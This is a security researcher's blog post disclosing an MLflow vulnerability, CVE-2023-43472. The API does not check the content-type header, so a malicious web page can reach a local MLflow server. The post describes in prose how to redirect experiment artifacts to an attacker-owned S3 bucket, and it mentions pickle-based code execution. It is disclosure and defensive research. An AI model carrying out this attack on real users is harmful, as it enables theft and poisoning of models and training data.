Skip to content

Contrast discovers MLflow framework zero-day that threatens to poison machine language models

    
Contrast discovers MLflow framework zero-day that threatens to poison machine language models

Most Machine Language (ML) tools — including the development frameworks used for managing ML life cycles — are relatively new, which means they could well  have security vulnerabilities. 

After finding two Common Vulnerabilities and Exposures (CVEs)  in the Togglz web console (the cross-site scripting [XSS] CVE-2020-28192 and the cross-site request forgery [CSRF]  CVE-2020-28191), I decided to check out MLflow, a development framework for ML life cycle management, thinking that it could potentially be vulnerable. 

It was. Specifically, I found a misconfigured application programming interface (API) that fails to check the content-type header. This means that an attacker can make a simple request to localhost without triggering a preflight — i.e., an HTTP request of the OPTIONS method, sent before the request itself, in order to determine if it is safe to send the request. I found that this could be done in MLflow by using a text/plain content type, instead of the more proper application/JavaScript Object Notation (JSON) content type. 

An existential threat to companies being built around ML 

The result is an extremely dangerous vulnerability that threatens ML models: A successful attack can lead to the leaking of both an ML model and all training data to an attacker. This is an existential threat to companies being built around an ML model. Given a successful exploit of this vulnerability, an attacker could gain access/control that would be the equivalent of gaining write access with the source code of a company that writes software. 

I reported this CVE — designated CVE-2023-43472 — on Sept. 5, 2023 and directly emailed Databricks, the original creator and current maintainer of MLflow. I informed Databricks that I would be giving a talk describing the issue at the DefCamp security conference on Friday, Nov. 24. As of Nov. 29, Databricks reported that it was working on a fix that was scheduled to be released later this week.

This CVE impacts all versions of MLflow from at least 2.6.0, and most likely all 2.x versions. 

I'm not sure exactly how widely used MLflow is, but based on the number of stars it’s garnered on GitHub, it’s more popular than the Kubernetes-based Kubeflow: 15.9K stars for MLflow, vs. 13.2K for Kubeflow. For what it’s worth, when Canonical recently announced its Charmed MLflow MLops platform, Canonical Vice President of Product Management Cédric Gégout called MLflow “the leading AI framework for streamlining all ML stages.” 

The vulnerability

The MLflow user interface (http://localhost:5000/) contains a REST API. Normally, this wouldn't be vulnerable to Simple Request Attacks, as the POST request uses a content type of application/JSON, which would trigger a preflight request and therefore would not be vulnerable.

But in this case, the API doesn't check the content type header. Therefore, it’s possible to trigger a request with a content type of text/plain.

As can be seen in the above Request/Response, while the request body is valid JSON, the content-type set is text/plain. The API should reject this request, given that it’s of an unexpected type, but the API apparently doesn’t check the content type.

Using that, if you can get the MLflow user to visit a website for which you control the JavaScript — say, by creating a MLfLow tutorial website — you can effectively modify the Default Experiment and set the artifact location to a globally writable S3 bucket that you control. An adversary can then use that to exfiltrate any data sent to the bucket.

Unfortunately, the API is lacking some functionality. You can neither modify Experiments artifact_uri via the API nor delete the Default Experiment. But you can create new ones and modify the existing experiment name, so the new experiment is named “Default.”

The attack does the following:

  • Modify the Default experiment name to "Old.”

  • Create a new experiment named "Default" with an artifact_uri of an S3 bucket.

  • Once a new MLFLow run is done — e.g., mlflow run sklearn_elasticnet_wine -P alpha=0.5, experiment-name Default — the result of the run will be uploaded to the S3 bucket.

The payload is available here

Impact

This vulnerability allows an attacker to exfiltrate a serialized version of the ML model and the data used to train the model, if the attacker is able to get the MLFlow user to access a website they control.

Attacking a developer environment via drive-by localhost attacks

To put this vulnerability into context, there’s a widespread belief that services that are only bound to localhost are not accessible from the outside world. Unfortunately, this is not always the case. Developers, for the sake of convenience, configure the services that they are developing in a less secure way compared with how they would (hopefully!) configure them in higher-security environments. 

By compromising websites used by developers — simply by injecting JavaScript into advertisements served on those sites or by serving up a phishing attack that gets the developer to open a web browser on a compromised page — it is possible to reach out via non-pre-flighted HTTP requests to those services bound to localhost, either by exploiting common misconfigurations in the Spring application framework or via known vulnerabilities found by myself, including the recently disclosed CVE that I found in the popular Quarkus Java framework.

As I demonstrated during Friday’s Def Camp talk, it is possible to generate a remote code execution (RCE) on the developer’s machine or on other services on their private network. Given that developers have write access to codebases, AWS keys, server credentials, etc., access to the developer’s machine gives an attacker a great deal of scope to pivot to other resources on the network, as well as to either modify or to entirely steal the codebase.

Easy to exploit

CVE-2023-43472 would be relatively simple to exploit: an attacker merely has to get a target to visit a website that they control. At that point, the attacker can silently modify the location the data is saved to to be an S3 bucket under their control.

An exploit could be used to send data to a globally writable S3 bucket, from which it can be exfiltrated. 

Amazon S3 buckets are used to store all sorts of data: they’re just a way to store data programmatically in the cloud. There are no AWS security guardrails that could limit the extent of damage somebody could do in an exploit, given that the S3 bucket is created and owned by the attacker. 

How this could affect ML models

A successful exploit could lead to more than data exfiltration. Given that an ML model is stored in the bucket, there would be potential to poison the ML model itself. In such an attack, an adversary is able to inject bad data into the model’s training pool, causing it to learn something it shouldn’t. 

If/when the model is read by the victim, there’s also the potential for a modified model.pkl file to contain a Python pickle exploit, which can lead to RCE on the victim’s machine.

What to do

MLflow users should upgrade to the new version as soon as it's available.

Get Demo

Read more:

Joseph Beeton, Senior Application Security Researcher, Contrast Security

Joseph Beeton, Senior Application Security Researcher, Contrast Security

Joseph Beeton is a Senior Security Researcher for Contrast Security and a recovering Java Developer. He started his career as a Java developer writing archive/backup software before moving to a large financial company working on web applications and backend APIs. However, after a while, writing yet another microservice isn't that much fun anymore. Breaking them was, though. Thus, he moved to Application Security and from there on to Research.